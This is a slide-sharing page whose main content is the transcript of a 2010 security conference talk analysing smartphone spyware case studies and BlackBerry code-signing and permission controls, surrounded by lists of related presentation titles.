 
Numbers - Analytics Driving Economy
Numbers - Analytics Driving EconomyNumbers - Analytics Driving Economy
Numbers - Analytics Driving EconomyVishal Gurbuxani
 
AdMob 2010 mart istatistikleri
AdMob 2010 mart istatistikleriAdMob 2010 mart istatistikleri
AdMob 2010 mart istatistikleriErol Dizdar
 
Ad mob 2010 mart istatistikleri-
Ad mob 2010 mart istatistikleri-Ad mob 2010 mart istatistikleri-
Ad mob 2010 mart istatistikleri-Erol Dizdar
 
Ad mob mobile-metrics-mar-10
Ad mob mobile-metrics-mar-10Ad mob mobile-metrics-mar-10
Ad mob mobile-metrics-mar-10Erol Dizdar
 
Mobile 101 Class 1: Technology and Mobile Behavior
Mobile 101 Class 1: Technology and Mobile BehaviorMobile 101 Class 1: Technology and Mobile Behavior
Mobile 101 Class 1: Technology and Mobile BehaviorThe Media Kitchen
 
Quantacast Mobile Web trends report 2009
Quantacast Mobile Web trends report 2009Quantacast Mobile Web trends report 2009
Quantacast Mobile Web trends report 2009guestd94b193
 
Android and its apps market overview
Android and its apps market overviewAndroid and its apps market overview
Android and its apps market overview01Booster
 
Comilion introduction presentation 26102012 (1)
Comilion introduction presentation 26102012 (1)Comilion introduction presentation 26102012 (1)
Comilion introduction presentation 26102012 (1)AP DealFlow
 
The Chronicles of a Mobile-Web Economy
The Chronicles of a Mobile-Web EconomyThe Chronicles of a Mobile-Web Economy
The Chronicles of a Mobile-Web EconomyBernard Leong
 
Internet world mobile marketing 270410
Internet world mobile marketing 270410Internet world mobile marketing 270410
Internet world mobile marketing 270410Jason Cross
 
Australian broadcasting summit 2011
Australian broadcasting summit 2011Australian broadcasting summit 2011
Australian broadcasting summit 2011Lauren Oldham
 
Enterprise Mobility Computerworld Mar 2012
Enterprise Mobility Computerworld Mar 2012Enterprise Mobility Computerworld Mar 2012
Enterprise Mobility Computerworld Mar 2012Exicon
 
中国アプリ市場とその周辺
中国アプリ市場とその周辺中国アプリ市場とその周辺
中国アプリ市場とその周辺良太郎 小原
 
Smartphone Strategy (Telecom Operators)
Smartphone Strategy (Telecom Operators)Smartphone Strategy (Telecom Operators)
Smartphone Strategy (Telecom Operators)Roel Honning
 
How mobile-ready are corporate websites?
How mobile-ready are corporate websites?How mobile-ready are corporate websites?
How mobile-ready are corporate websites?Web Managers Group
 

Similar to iSec Forum NYC - Smartphone Backdoors an Analysis of Mobile Spyware (20)

The rules of mobile advertising
The rules of mobile advertisingThe rules of mobile advertising
The rules of mobile advertising
 
Mobclix Sfmobile
Mobclix SfmobileMobclix Sfmobile
Mobclix Sfmobile
 
Numbers - Analytics Driving Economy
Numbers - Analytics Driving EconomyNumbers - Analytics Driving Economy
Numbers - Analytics Driving Economy
 
AdMob 2010 mart istatistikleri
AdMob 2010 mart istatistikleriAdMob 2010 mart istatistikleri
AdMob 2010 mart istatistikleri
 
Ad mob 2010 mart istatistikleri-
Ad mob 2010 mart istatistikleri-Ad mob 2010 mart istatistikleri-
Ad mob 2010 mart istatistikleri-
 
Ad mob mobile-metrics-mar-10
Ad mob mobile-metrics-mar-10Ad mob mobile-metrics-mar-10
Ad mob mobile-metrics-mar-10
 
Mobile 101 Class 1: Technology and Mobile Behavior
Mobile 101 Class 1: Technology and Mobile BehaviorMobile 101 Class 1: Technology and Mobile Behavior
Mobile 101 Class 1: Technology and Mobile Behavior
 
Quantacast Mobile Web trends report 2009
Quantacast Mobile Web trends report 2009Quantacast Mobile Web trends report 2009
Quantacast Mobile Web trends report 2009
 
Android and its apps market overview
Android and its apps market overviewAndroid and its apps market overview
Android and its apps market overview
 
Comilion introduction presentation 26102012 (1)
Comilion introduction presentation 26102012 (1)Comilion introduction presentation 26102012 (1)
Comilion introduction presentation 26102012 (1)
 
The Chronicles of a Mobile-Web Economy
The Chronicles of a Mobile-Web EconomyThe Chronicles of a Mobile-Web Economy
The Chronicles of a Mobile-Web Economy
 
Seventynine.mobi
Seventynine.mobiSeventynine.mobi
Seventynine.mobi
 
Internet world mobile marketing 270410
Internet world mobile marketing 270410Internet world mobile marketing 270410
Internet world mobile marketing 270410
 
Australian broadcasting summit 2011
Australian broadcasting summit 2011Australian broadcasting summit 2011
Australian broadcasting summit 2011
 
5 mobile trends (2009)
5 mobile trends (2009)5 mobile trends (2009)
5 mobile trends (2009)
 
Enterprise Mobility Computerworld Mar 2012
Enterprise Mobility Computerworld Mar 2012Enterprise Mobility Computerworld Mar 2012
Enterprise Mobility Computerworld Mar 2012
 
Hk enterprise mobility computerworld mar 2012
Hk enterprise mobility computerworld mar 2012Hk enterprise mobility computerworld mar 2012
Hk enterprise mobility computerworld mar 2012
 
中国アプリ市場とその周辺
中国アプリ市場とその周辺中国アプリ市場とその周辺
中国アプリ市場とその周辺
 
Smartphone Strategy (Telecom Operators)
Smartphone Strategy (Telecom Operators)Smartphone Strategy (Telecom Operators)
Smartphone Strategy (Telecom Operators)
 
How mobile-ready are corporate websites?
How mobile-ready are corporate websites?How mobile-ready are corporate websites?
How mobile-ready are corporate websites?
 

More from Tyler Shields

The New Mobile Landscape - OWASP Ireland
The New Mobile Landscape - OWASP IrelandThe New Mobile Landscape - OWASP Ireland
The New Mobile Landscape - OWASP IrelandTyler Shields
 
Defending Behind the Mobile Device
Defending Behind the Mobile DeviceDefending Behind the Mobile Device
Defending Behind the Mobile DeviceTyler Shields
 
Avoiding the Pandora Pitfall
Avoiding the Pandora PitfallAvoiding the Pandora Pitfall
Avoiding the Pandora PitfallTyler Shields
 
Social and Mobile and Cloud - OH MY!
Social and Mobile and Cloud - OH MY!Social and Mobile and Cloud - OH MY!
Social and Mobile and Cloud - OH MY!Tyler Shields
 
Social Media Basics: Security Loopholes with Twitter & Other Social Media
Social Media Basics: Security Loopholes with Twitter & Other Social MediaSocial Media Basics: Security Loopholes with Twitter & Other Social Media
Social Media Basics: Security Loopholes with Twitter & Other Social MediaTyler Shields
 
United Security Summit 2011 - Using the Mobile Top 10 as a Guide to Assessing...
United Security Summit 2011 - Using the Mobile Top 10 as a Guide to Assessing...United Security Summit 2011 - Using the Mobile Top 10 as a Guide to Assessing...
United Security Summit 2011 - Using the Mobile Top 10 as a Guide to Assessing...Tyler Shields
 
Shmoocon 2010 - The Monkey Steals the Berries
Shmoocon 2010 - The Monkey Steals the BerriesShmoocon 2010 - The Monkey Steals the Berries
Shmoocon 2010 - The Monkey Steals the BerriesTyler Shields
 
Survey of Rootkit Technologies and Their Impact on Digital Forensics
Survey of Rootkit Technologies and Their Impact on Digital ForensicsSurvey of Rootkit Technologies and Their Impact on Digital Forensics
Survey of Rootkit Technologies and Their Impact on Digital ForensicsTyler Shields
 
Source Boston 2009 - Anti-Debugging A Developers Viewpoint
Source Boston 2009 - Anti-Debugging A Developers ViewpointSource Boston 2009 - Anti-Debugging A Developers Viewpoint
Source Boston 2009 - Anti-Debugging A Developers ViewpointTyler Shields
 
Static Detection of Application Backdoors
Static Detection of Application BackdoorsStatic Detection of Application Backdoors
Static Detection of Application BackdoorsTyler Shields
 
Blackhat Europe 2009 - Detecting Certified Pre Owned Software
Blackhat Europe 2009 - Detecting Certified Pre Owned SoftwareBlackhat Europe 2009 - Detecting Certified Pre Owned Software
Blackhat Europe 2009 - Detecting Certified Pre Owned SoftwareTyler Shields
 
Anti-Debugging - A Developers View
Anti-Debugging - A Developers ViewAnti-Debugging - A Developers View
Anti-Debugging - A Developers ViewTyler Shields
 
Praetorian Veracode Webinar - Mobile Privacy
Praetorian Veracode Webinar - Mobile PrivacyPraetorian Veracode Webinar - Mobile Privacy
Praetorian Veracode Webinar - Mobile PrivacyTyler Shields
 
Owasp Ireland - The State of Software Security
Owasp Ireland - The State of Software SecurityOwasp Ireland - The State of Software Security
Owasp Ireland - The State of Software SecurityTyler Shields
 
More Apps More Problems
More Apps More ProblemsMore Apps More Problems
More Apps More ProblemsTyler Shields
 
Dirty Little Secret - Mobile Applications Invading Your Privacy
Dirty Little Secret - Mobile Applications Invading Your PrivacyDirty Little Secret - Mobile Applications Invading Your Privacy
Dirty Little Secret - Mobile Applications Invading Your PrivacyTyler Shields
 
IT Hot Topics - Mobile Security Threats at Every Layer
IT Hot Topics - Mobile Security Threats at Every LayerIT Hot Topics - Mobile Security Threats at Every Layer
IT Hot Topics - Mobile Security Threats at Every LayerTyler Shields
 
IQT 2010 - The App Does That!?
IQT 2010 - The App Does That!?IQT 2010 - The App Does That!?
IQT 2010 - The App Does That!?Tyler Shields
 
Triangle InfoSecCon - Detecting Certified Pre-Owned Software and Devices
Triangle InfoSecCon - Detecting Certified Pre-Owned Software and DevicesTriangle InfoSecCon - Detecting Certified Pre-Owned Software and Devices
Triangle InfoSecCon - Detecting Certified Pre-Owned Software and DevicesTyler Shields
 
Intelligence on the Intractable Problem of Software Security
Intelligence on the Intractable Problem of Software SecurityIntelligence on the Intractable Problem of Software Security
Intelligence on the Intractable Problem of Software SecurityTyler Shields
 

More from Tyler Shields (20)

The New Mobile Landscape - OWASP Ireland
The New Mobile Landscape - OWASP IrelandThe New Mobile Landscape - OWASP Ireland
The New Mobile Landscape - OWASP Ireland
 
Defending Behind the Mobile Device
Defending Behind the Mobile DeviceDefending Behind the Mobile Device
Defending Behind the Mobile Device
 
Avoiding the Pandora Pitfall
Avoiding the Pandora PitfallAvoiding the Pandora Pitfall
Avoiding the Pandora Pitfall
 
Social and Mobile and Cloud - OH MY!
Social and Mobile and Cloud - OH MY!Social and Mobile and Cloud - OH MY!
Social and Mobile and Cloud - OH MY!
 
Social Media Basics: Security Loopholes with Twitter & Other Social Media
Social Media Basics: Security Loopholes with Twitter & Other Social MediaSocial Media Basics: Security Loopholes with Twitter & Other Social Media
Social Media Basics: Security Loopholes with Twitter & Other Social Media
 
United Security Summit 2011 - Using the Mobile Top 10 as a Guide to Assessing...
United Security Summit 2011 - Using the Mobile Top 10 as a Guide to Assessing...United Security Summit 2011 - Using the Mobile Top 10 as a Guide to Assessing...
United Security Summit 2011 - Using the Mobile Top 10 as a Guide to Assessing...
 
Shmoocon 2010 - The Monkey Steals the Berries
Shmoocon 2010 - The Monkey Steals the BerriesShmoocon 2010 - The Monkey Steals the Berries
Shmoocon 2010 - The Monkey Steals the Berries
 
Survey of Rootkit Technologies and Their Impact on Digital Forensics
Survey of Rootkit Technologies and Their Impact on Digital ForensicsSurvey of Rootkit Technologies and Their Impact on Digital Forensics
Survey of Rootkit Technologies and Their Impact on Digital Forensics
 
Source Boston 2009 - Anti-Debugging A Developers Viewpoint
Source Boston 2009 - Anti-Debugging A Developers ViewpointSource Boston 2009 - Anti-Debugging A Developers Viewpoint
Source Boston 2009 - Anti-Debugging A Developers Viewpoint
 
Static Detection of Application Backdoors
Static Detection of Application BackdoorsStatic Detection of Application Backdoors
Static Detection of Application Backdoors
 
Blackhat Europe 2009 - Detecting Certified Pre Owned Software
Blackhat Europe 2009 - Detecting Certified Pre Owned SoftwareBlackhat Europe 2009 - Detecting Certified Pre Owned Software
Blackhat Europe 2009 - Detecting Certified Pre Owned Software
 
Anti-Debugging - A Developers View
Anti-Debugging - A Developers ViewAnti-Debugging - A Developers View
Anti-Debugging - A Developers View
 
Praetorian Veracode Webinar - Mobile Privacy
Praetorian Veracode Webinar - Mobile PrivacyPraetorian Veracode Webinar - Mobile Privacy
Praetorian Veracode Webinar - Mobile Privacy
 
Owasp Ireland - The State of Software Security
Owasp Ireland - The State of Software SecurityOwasp Ireland - The State of Software Security
Owasp Ireland - The State of Software Security
 
More Apps More Problems
More Apps More ProblemsMore Apps More Problems
More Apps More Problems
 
Dirty Little Secret - Mobile Applications Invading Your Privacy
Dirty Little Secret - Mobile Applications Invading Your PrivacyDirty Little Secret - Mobile Applications Invading Your Privacy
Dirty Little Secret - Mobile Applications Invading Your Privacy
 
IT Hot Topics - Mobile Security Threats at Every Layer
IT Hot Topics - Mobile Security Threats at Every LayerIT Hot Topics - Mobile Security Threats at Every Layer
IT Hot Topics - Mobile Security Threats at Every Layer
 
IQT 2010 - The App Does That!?
IQT 2010 - The App Does That!?IQT 2010 - The App Does That!?
IQT 2010 - The App Does That!?
 
Triangle InfoSecCon - Detecting Certified Pre-Owned Software and Devices
Triangle InfoSecCon - Detecting Certified Pre-Owned Software and DevicesTriangle InfoSecCon - Detecting Certified Pre-Owned Software and Devices
Triangle InfoSecCon - Detecting Certified Pre-Owned Software and Devices
 
Intelligence on the Intractable Problem of Software Security
Intelligence on the Intractable Problem of Software SecurityIntelligence on the Intractable Problem of Software Security
Intelligence on the Intractable Problem of Software Security
 

Recently uploaded

Training state-of-the-art general text embedding
Training state-of-the-art general text embeddingTraining state-of-the-art general text embedding
Training state-of-the-art general text embeddingZilliz
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek SchlawackFwdays
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024Lonnie McRorey
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxLoriGlavin3
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 
Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rick Flair
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfMounikaPolabathina
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESSALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESmohitsingh558521
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Manik S Magar
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersNicole Novielli
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionDilum Bandara
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxLoriGlavin3
 
Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsNathaniel Shimoni
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 

Recently uploaded (20)

Training state-of-the-art general text embedding
Training state-of-the-art general text embeddingTraining state-of-the-art general text embedding
Training state-of-the-art general text embedding
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdf
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptx
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESSALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software Developers
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An Introduction
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
 
Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directions
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 

iSec Forum NYC - Smartphone Backdoors an Analysis of Mobile Spyware

  • 1. Smartphone Backdoors An Analysis of Blackberry and Other Mobile Device Spyware The Monkey Steals The Berries
  • 2. Presenter Background Currently Sr. Security Researcher, Veracode, Inc. Previously Security Consultant - Symantec Security Consultant - @Stake Incident Response and Forensics Handler – US Government Wishes He Was Infinitely Rich Personal Trainer to hot Hollywood starlets © 2010 Veracode, Inc. 3
  • 3. Mobile Spyware  Often includes modifications to legitimate programs designed to compromise the device or device data  Often inserted by those who have legitimate access to source code or distribution binaries  May be intentional or inadvertent  Not specific to any particular programming language  Not specific to any particular mobile Operating System © 2010 Veracode, Inc. 4
  • 4. Attacker Motivation  Practical method of compromise for many systems – Let the users install your backdoor on systems you have no access to – Looks like legitimate software so may bypass mobile AV  Retrieve and manipulate valuable private data – Looks like legitimate application traffic so little risk of detection  For high value targets such as financial services and government it becomes cost effective and more reliable – High-end attackers will not be content to exploit opportunistic vulnerabilities, which might be fixed and therefore unavailable at a critical juncture. They may seek to implant vulnerability for later exploitation – Think “Aurora” for Mobile Devices © 2010 Veracode, Inc. 5
  • 5. Why is Mobile The Future of Spyware © 2010 Veracode, Inc. 6
  • 6. Units Sold By Operating System 90,000.00 80,879 80,000.00 72,934 70,000.00 60,000.00 Units Sold 50,000.00 40,000.00 34,347 2008 Units 2009 Units 30,000.00 24,890 23,149 20,000.00 16,498 11,418 10,622 10,000.00 15,028 6,798 1,193 4,027 8,127 641 0 1,112 0.00 Symbian Research In iPhone OS Microsoft Linux Android WebOS Other OSs Motion Windows Mobile Data Source: DISTMO Appstore Analytics Operating System www.appstore.info © 2010 Veracode, Inc. 7
  • 7. Units Sold Market Growth 8% 6% 6% Percentage Growth in Market Share 4% 3% 3% 2% 0% 0% Symbian Research In iPhone OS Microsoft Linux Android WebOS Other OSs 0% Motion Windows Mobile -2% -2% -3% -3% -4% -6% -6% Operating System Data Source: DISTMO Appstore Analytics www.appstore.info © 2010 Veracode, Inc. 8
  • 8. Application Counts 160,000 150,998 140,000 120,000 Number Of Applications In Store Last Counted Jan/Feb 2010 100,000 80,000 60,000 40,000 19,897 20,000 6118 5291 1452 944 0 iPhone App Store Android Nokia Ovi Store Blackberry App Palm App Catalog Windows Marketplace (Maemo) World Marketplace Data Source: DISTMO Appstore Analytics Marketplace Name www.appstore.info © 2010 Veracode, Inc. 9
  • 9. iPhone Applications Sold 3.00 Applications Sold (In Billions) 2.50 2.00 1.50 1.00 0.50 0.00 Data Source: Gartner, Inc., a research and advisory firm © 2010 Veracode, Inc. 10
  • 10. Back To The Future © 2010 Veracode, Inc. 11
  • 11. Back To The Future © 2010 Veracode, Inc. 12
  • 12. Case Studies of Mobile Spyware © 2010 Veracode, Inc. 13
  • 13. FlexiSpy  http://www.flexispy.com  $149 - $350 PER YEAR depending on features  Features – Remote Listening – C&C Over SMS – SMS and Email Logging – Call History Logging – Location Tracking – Call Interception – GPS Tracking – Symbian, Blackberry, Windows Mobile Supported © 2010 Veracode, Inc. 14
  • 14. Mobile Spy  http://www.mobile-spy.com  $49.97 PER QUARTER or $99.97 PER YEAR  Features – SMS Logging – Call Logging – GPS Logging – Web URL Logging – BlackBerry, iPhone (Jailbroken Only), Android, Windows Mobile or Symbian © 2010 Veracode, Inc. 16
  • 15. Etisalat (SS8)  Cell carrier in United Arab Emirates (UAE)  Pushed via SMS as “software patch” for Blackberry smartphones  Upgrade urged to “enhance performance” of Blackberry service  Blackberry PIN messaging as C&C  Sets FLAG_HIDDEN bit to true  Interception of outbound email / SMS only  Discovered due to flooded listener server cause retries that drained batteries of affected devices  Accidentally released the .jar as well as the .cod (ooopsie?!) © 2010 Veracode, Inc. 18
  • 16. Bugs & Phonesnoop  Bugs – Exfiltration of inbound and outbound email – Hidden  PhoneSnoop – Remotely turn on a Blackberry phone microphone – Listen in on target ambient conversation © 2010 Veracode, Inc. 19
  • 17. Storm8 Phone Number Farming – iMobsters and Vampires Live (and others) – “Storm8 has written the software for all its games in such a way that it automatically accesses, collects, and transmits the wireless telephone number of each iPhone user who downloads any Storm8 game," the suit alleges. " ... Storm8, though, has no reason whatsoever to access the wireless phone numbers of the iPhones on which its games are installed." – “Storm8 says that this code was used in development tests, only inadvertently remained in production builds, and removed as soon as it was alerted to the issue.” – These were available via the iTunes App Store! – http://www.boingboing.net/2009/11/05/iphone-game-dev-accu.html © 2010 Veracode, Inc. 20
  • 18. Symbian Sexy Space – Poses as legitimate server ACSServer.exe – Calls itself 'Sexy Space„ – Steals phone and network information – Exfiltrates data via hacker owned web site connection – Can SPAM contact list members – Basically a “botnet” for mobile phones – Signing process  Anti-virus scan using F-Secure - Approx 43% proactive detection rate (PCWorld)  Random selection of inbound manually assessed – Symbian signed this binary as safe! – http://news.zdnet.co.uk/security/0,1000000189,39684313,00.htm © 2010 Veracode, Inc. 21
  • 19. 09Droid – Banking Applications Attack – Droid app that masquerades as any number of different target banking applications – Target banks included  Royal Bank of Canada  Chase  BB&T  SunTrust  Over 50 total financial institutions were affected – May steal and exfiltrate banking credentials – Approved and downloaded from Google’s Android Marketplace! – http://www.theinquirer.net/inquirer/news/1585716/fraud-hits-android-apps- market – http://www.pcadvisor.co.uk/news/index.cfm?RSS&NewsID=3209953 – http://www.f-secure.com/weblog/archives/00001852.html © 2010 Veracode, Inc. 23
  • 20. Blackberry Security Mechanisms © 2010 Veracode, Inc. 24
  • 21. Blackberry Takes Security Seriously  KB05499: Protecting the BlackBerry smartphone and BlackBerry Enterprise Server against malware http://www.blackberry.com/btsc/search.do?cmd=displayKC&docTyp e=kc&externalId=KB05499  Protecting the BlackBerry device platform against malware http://docs.blackberry.com/en/admin/deliverables/1835/Protecting the BlackBerry device platform against malware.pdf  Placing the BlackBerry Enterprise Solution in a segmented network http://docs.blackberry.com/en/admin/deliverables/1460/Placing_the_ BlackBerry_Enterprise_Solution_in_a_Segmented_Network.pdf  BlackBerry Enterprise Server Policy Reference Guide http://docs.blackberry.com/en/admin/deliverables/7228/Policy_Refer ence_Guide.pdf © 2010 Veracode, Inc. 25
  • 22. Does It Really Matter?! Only 23% of smartphone owners use the security software installed on the devices. (Source: Trend Micro Inc. survey of 1,016 U.S. smartphone users, June 2009) 13% of organizations currently protect from mobile viruses (Mobile Security 2009 Survey by Goode Intelligence) © 2010 Veracode, Inc. 26
  • 23. Code Signing  Subset of Blackberry API considered “controlled”  Use of controlled package, class, or method requires appropriate code signature  Blackberry Signature Tool comes with the Blackberry JDE  Acquire signing keys by filling out a web form and paying $20 – This not is a high barrier to entry – 48 hours later you receive signing keys  Install keys into signature tool © 2010 Veracode, Inc. 27
  • 24. Code Signing Process  Hash of code sent to RIM for API tracking purposes only  RIM does not get source code  COD file is signed based on required keys  Application ready to be deployed  Easy to acquire anonymous keys © 2010 Veracode, Inc. 28
  • 25. IT Policies  Requires connection to Blackberry Enterprise Server (BES)  Supersedes lower levels of security restrictions  Prevent devices from downloading third-party applications over wireless  Prevent installation of specific third-party applications  Control permissions of third party applications – Allow Internal Connections – Allow Third-Party Apps to Use Serial Port – Allow External Connections  MOSTLY “Default Allow All” policy for BES and non-BES devices © 2010 Veracode, Inc. 29
  • 26. Application Policies  Can be controlled at the BES  If no BES present, controls are set on the handheld itself  Can only be MORE restrictive than the IT policy, never less  Control individual resource access per application  Control individual connection access per application  MOSTLY “Default Allow All” policy for BES and non-BES devices © 2010 Veracode, Inc. 30
  • 27. V4.7.0.148 Default 3rd Party Application Permissions Bluetooth Phone USB Connections Location Data Connections Connections Internet IPC Device Settings Application Media Themes Input Simulation Management Security Timer Browser Filtering Recording Reset Email Data Organizer Data Files Security Data © 2010 Veracode, Inc. 31
  • 28. V5.0.0.328 Default 3rd Party Application Permissions Bluetooth Phone USB Connections Location Data Connections Connections Server Network Internet IPC Device Settings Application Media Themes Input Simulation Management Security Timer Display Information Browser Filtering Recording Reset While Locked Email Data Organizer Data Files Security Data © 2010 Veracode, Inc. 32
  • 29. V5.0.0.328 Trusted 3rd Party Application Permissions Bluetooth Phone USB Connections Location Data Connections Connections Server Network Internet IPC Device Settings Application Media Themes Input Simulation Management Security Timer Display Information Browser Filtering Recording Reset While Locked Email Data Organizer Data Files Security Data © 2010 Veracode, Inc. 33
  • 30. Installation Methods © 2010 Veracode, Inc. 34
